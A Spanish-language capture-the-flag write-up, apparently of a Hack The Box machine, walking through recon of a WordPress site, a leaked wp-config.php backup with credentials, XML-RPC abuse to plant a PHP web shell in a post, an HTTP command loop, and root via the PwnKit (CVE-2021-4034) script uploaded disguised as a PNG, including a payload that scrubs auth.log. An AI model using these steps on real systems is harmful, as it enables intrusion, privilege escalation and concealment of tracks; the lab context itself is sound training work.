Conocimientos
-
Information Disclosure
-
Abuso de XMLRPC
-
Explotaciรณn de Pwnkit
-
Python interactivo
-
Modificaciรณn /etc/passwd (Shell como root)
Reconocimiento
Escaneo de puertos con nmap
Descubrimiento de puertos abiertos
nmap -p- --open --min-rate 5000 -n -Pn -sS 10.10.11.142 -oG openports
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-21 08:58 GMT
Nmap scan report for 10.10.11.142
Host is up (0.14s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds
Escaneo de versiรณn y servicios de cada puerto
nmap -sCV -p80 10.10.11.142 -oN portscan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-21 09:00 GMT
Nmap scan report for 10.10.11.142
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.9
|_http-title: UHC Jan Finals – New Month, New Boxes
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.80 seconds
Puerto 80 (HTTP)
Con whatweb analizo las tecnologรญas que estรก empleando el servidor web
whatweb http://10.10.11.142
http://10.10.11.142 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.11.142], JQuery[3.6.0], MetaGenerator[WordPress 5.9], Script[text/javascript], Title[UHC Jan Finals – New Month, New Boxes], UncommonHeaders[link], WordPress[5.9]
La pรกgina principal se ve asรญ:
En el cรณdigo fuente se puede ver un dominio
curl -s -X GET http://10.10.11.142/ | grep htb
<link rel='dns-prefetch' href='//pressed.htb' />
Lo aรฑado al /etc/hosts
Aplico un escano con wpscan
wpscan --url http://pressed.htb/ --api-token $WPTOKEN
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ยฎ
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
Encuentra un backup del wp-config.php
[!] http://pressed.htb/wp-config.php.bak
| Found By: Direct Access (Aggressive Detection)
Lo descargo, y dentro hay credenciales de acceso a la base de datos
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** Database username */
define( 'DB_USER', 'admin' );
/** Database password */
define( 'DB_PASSWORD', 'uhc-jan-finals-2021' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
Una secciรณn de la web reporta los User-Agent de todas las peticiones que se han tramitado
Tramito una peticiรณn modificando mi User-Agent, pero no interpreta el cรณdigo PHP
curl -s -X GET http://10.10.11.142/ -H 'User-Agent: <?php system("whoami"); ?>'
Es probable que sea un rabbit hole. Wp-scan tambiรฉn habรญa encontrado que el XML-RPC estรก habilitado
[+] XML-RPC seems to be enabled: http://pressed.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
Pruebo a iniciar sesiรณn en el wp-login.php
con la contraseรฑa uhc-jan-finals-2021
, pero no es correcta. Sin embargo, como esta mรกquina es del 2022, al cambiar a ese valor si que es vรกlida
Solicita una validaciรณn por OTP
Puedo tratar de autenticarme por el nullrpc.php
, suponiendo que por aquรญ no me pide segundo factor de autenticaciรณn. Primero listo todos los mรฉtodos disponibles
curl -s -X POST http://10.10.11.142/xmlrpc.php -d '<?xml version="1.0" encoding="utf-8"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>' | grep -oP '>.*?<' | tr -d '<>' | grep wp
wp.restoreRevision
wp.getRevisions
wp.getPostTypes
wp.getPostType
wp.getPostFormats
wp.getMediaLibrary
wp.getMediaItem
wp.getCommentStatusList
wp.newComment
wp.editComment
wp.deleteComment
wp.getComments
wp.getComment
wp.setOptions
wp.getOptions
wp.getPageTemplates
wp.getPageStatusList
wp.getPostStatusList
wp.getCommentCount
wp.deleteFile
wp.uploadFile
wp.suggestCategories
wp.deleteCategory
wp.newCategory
wp.getTags
wp.getCategories
wp.getAuthors
wp.getPageList
wp.editPage
wp.deletePage
wp.newPage
wp.getPages
wp.getPage
wp.editProfile
wp.getProfile
wp.getUsers
wp.getUser
wp.getTaxonomies
wp.getTaxonomy
wp.getTerms
wp.getTerm
wp.deleteTerm
wp.editTerm
wp.newTerm
wp.getPosts
wp.getPost
wp.deletePost
wp.editPost
wp.newPost
wp.getUsersBlogs
Para trabajar mรกs comodamente, instalo un mรณdulo de python. Intento poder editar los posts existentes en la web
pip3 install python-wordpress-xmlrpc
Python 3.11.1 (main, Dec 31 2022, 10:23:59) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from wordpress_xmlrpc import Client
>>> from wordpress_xmlrpc.methods import posts
>>> client = Client("http://pressed.htb/xmlrpc.php", 'admin', 'uhc-jan-finals-2022')
>>> post = client.call(posts.GetPosts())
>>> post
[<WordPressPost: b'UHC January Finals Under Way'>]
Unicamente hay un post. Puedo intentar ver como estรก compuesto
>>> post[0].link
'/index.php/2022/01/28/hello-world/'
>>> post[0].content
'<!-- wp:paragraph -->\n<p>The UHC January Finals are underway! After this event, there are only three left until the season one finals in which all the previous winners will compete in the Tournament of Champions. This event a total of eight players qualified, seven of which are from Brazil and there is one lone Canadian. Metrics for this event can be found below.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:php-everywhere-block/php {"code":"JTNDJTNGcGhwJTIwJTIwZWNobyhmaWxlX2dldF9jb250ZW50cygnJTJGdmFyJTJGd3d3JTJGaHRtbCUyRm91dHB1dC5sb2cnKSklM0IlMjAlM0YlM0U=","version":"3.0.0"} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->'
Le hago un decode a la cadena en base64 y la url-decodeo
echo "JTNDJTNGcGhwJTIwJTIwZWNobyhmaWxlX2dldF9jb250ZW50cygnJTJGdmFyJTJGd3d3JTJGaHRtbCUyRm91dHB1dC5sb2cnKSklM0IlMjAlM0YlM0U=" | base64 -d; echo
%3C%3Fphp%20%20echo(file_get_contents('%2Fvar%2Fwww%2Fhtml%2Foutput.log'))%3B%20%3F%3E
โฏ php --interactive
Interactive shell
php > echo urldecode("%3C%3Fphp%20%20echo(file_get_contents('%2Fvar%2Fwww%2Fhtml%2Foutput.log'))%3B%20%3F%3E");
<?php echo(file_get_contents('/var/www/html/output.log')); ?>
Imprime el contenido de un log. Puedo tratar de cambiarlo para obtener RCE
<?php
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>
base64 -w 0 test; echo
PD9waHAKICBlY2hvICI8cHJlPiIgLiBzaGVsbF9leGVjKCRfUkVRVUVTVFsnY21kJ10pIC4gIjwvcHJlPiI7Cj8+Cg==
>>> new_post = post[0]
>>> new_post.content = '<!-- wp:paragraph -->\n<p>The UHC January Finals are underway! After this event, there are only three left until the season one finals in which all the previous winners will compete in the Tournament of Champions. This event a total of eight players qualified, seven of which are from Brazil and there is one lone Canadian. Metrics for this event can be found below.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:php-everywhere-block/php {"code":"PD9waHAKICBzaGVsbF9leGVjKCRfUkVRVUVTVFsnY21kJ10pOwo/Pgo=","version":"3.0.0"} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragra
ph -->\n<p></p>\n<!-- /wp:paragraph -->'
>>> client.call(posts.EditPost(new_post.id, new_post))
True
Pero hay reglas de firewall implementas y no puedo ganar acceso como www-data
, por lo que es necesario hacer un script en bash que se encargue de crear una ShelloverHTTP
#!/bin/bash
function ctrl_c(){
echo -e '\n'
exit 1
}
# Ctrl+C
trap ctrl_c INT
url="http://10.10.11.142/index.php/2022/01/28/hello-world/?cmd="
while [ "$command" != "exit" ]; do
echo -n "$~ " && read -r command
command="$(echo $command | tr ' ' '+')"
curl -s -X GET "$url$command" | grep "<pre>" -A 100 | grep "</pre>" -B 100 | sed 's/<pre>//' | sed 's/<\/pre>//'
done
Puedo ver la primera flag
$~ cat /home/htb/user.txt
997036fb9aaeb86406c23ece2e4aaafe
Escalada
Existe el pkexec
y es SUID
$~ which pkexec | xargs ls -l
-rwsr-xr-x 1 root root 23440 Jul 14 2021 /usr/bin/pkexec
El problema estรก en que no tengo conectividad con mi equipo para transferir el pwnkit
por HTTP, por lo que voy a utilizar un script en bash similar
wget https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh
Vuelvo al nullrpc.php
para poder ejecutarlo
>>> from wordpress_xmlrpc.methods import media
>>> with open ("pkwner.sh", "r") as f:
... filename= f.read()
...
>>> campos = { 'name': 'pkwner.sh', 'bits': filename, 'type': 'text/plain' }
>>> client.call(media.UploadFile(campos))
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/local/lib/python3.11/dist-packages/wordpress_xmlrpc/base.py", line 38, in call
raw_result = server_method(*args)
^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/xmlrpc/client.py", line 1122, in __call__
return self.__send(self.__name, args)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/xmlrpc/client.py", line 1464, in __request
response = self.__transport.request(
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/xmlrpc/client.py", line 1166, in request
return self.single_request(host, handler, request_body, verbose)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/xmlrpc/client.py", line 1182, in single_request
return self.parse_response(resp)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/xmlrpc/client.py", line 1354, in parse_response
return u.close()
^^^^^^^^^
File "/usr/lib/python3.11/xmlrpc/client.py", line 668, in close
raise Fault(**self._stack[0])
xmlrpc.client.Fault: <Fault 500: 'Could not write file pkwner.sh (Sorry, you are not allowed to upload this file type.).'>
De primeras da un error por el tipo de archivo. Pero le puedo poner otro Content-Type para solucionarlo
>>> campos = { 'name': 'pkwner.png', 'bits': filename, 'type': 'images/png' }
>>> client.call(media.UploadFile(campos))
{'attachment_id': '51', 'date_created_gmt': <DateTime '20230221T15:29:19' at 0x7f28de113950>, 'parent': 0, 'link': '/wp-content/uploads/2023/02/pkwner-1.png', 'title': 'pkwner.png', 'caption': '', 'description': '', 'metadata': False, 'type': 'images/png', 'thumbnail': '/wp-content/uploads/2023/02/pkwner-1.png', 'id': '51', 'file': 'pkwner.png', 'url': '/wp-content/uploads/2023/02/pkwner-1.png'}
Al ejecutar la bash pasa a ser SUID, segรบn habรญa definido en el script
system("PATH=/bin:/usr/bin:/usr/sbin:/usr/local/bin/:/usr/local/sbin;"
"rm -rf 'GCONV_PATH=.' 'pkwner';"
"cat /var/log/auth.log|grep -v pkwner >/tmp/al;cat /tmp/al >/var/log/auth.log;"
"chmod u+s /bin/bash");
exit(0);
$~ bash /var/www/html/wp-content/uploads/2023/02/pkwner-1.png
โโโโโโโ โโโ โโโโโโ โโโโโโโ โโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโ โโโโโโโ โโโโโโโโ โโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโ โโโ โโ โโโโโโโโโ โโโโโโโโโ โโโโโโโโ
โโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโ โโโ โโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโ โโโ
โโโ โโโ โโโ โโโโโโโโ โโโ โโโโโโโโโโโโโโโโ โโโ
CVE-2021-4034 PoC by Kim Schulz
[+] Setting up environment...
[+] Build offensive gconv shared module...
[+] Build mini executor...
hello[+] Nice Job
$~ ls -l /bin/bash
-rwsr-xr-x 1 root root 1183448 Jun 18 2020 /bin/bash
$~ bash -p -c 'whoami'
root
Puedo ver la segunda flag
$~ bash /var/www/html/wp-content/uploads/2023/02/pkwner-7.png
โโโโโโโ โโโ โโโโโโ โโโโโโโ โโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโ โโโโโโโ โโโโโโโโ โโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโ โโโ โโ โโโโโโโโโ โโโโโโโโโ โโโโโโโโ
โโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโ โโโ โโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโ โโโ
โโโ โโโ โโโ โโโโโโโโ โโโ โโโโโโโโโโโโโโโโ โโโ
CVE-2021-4034 PoC by Kim Schulz
[+] Setting up environment...
[+] Build offensive gconv shared module...
[+] Build mini executor...
d69d71121dbfab36e96f98b4d947448d
hello[+] Nice Job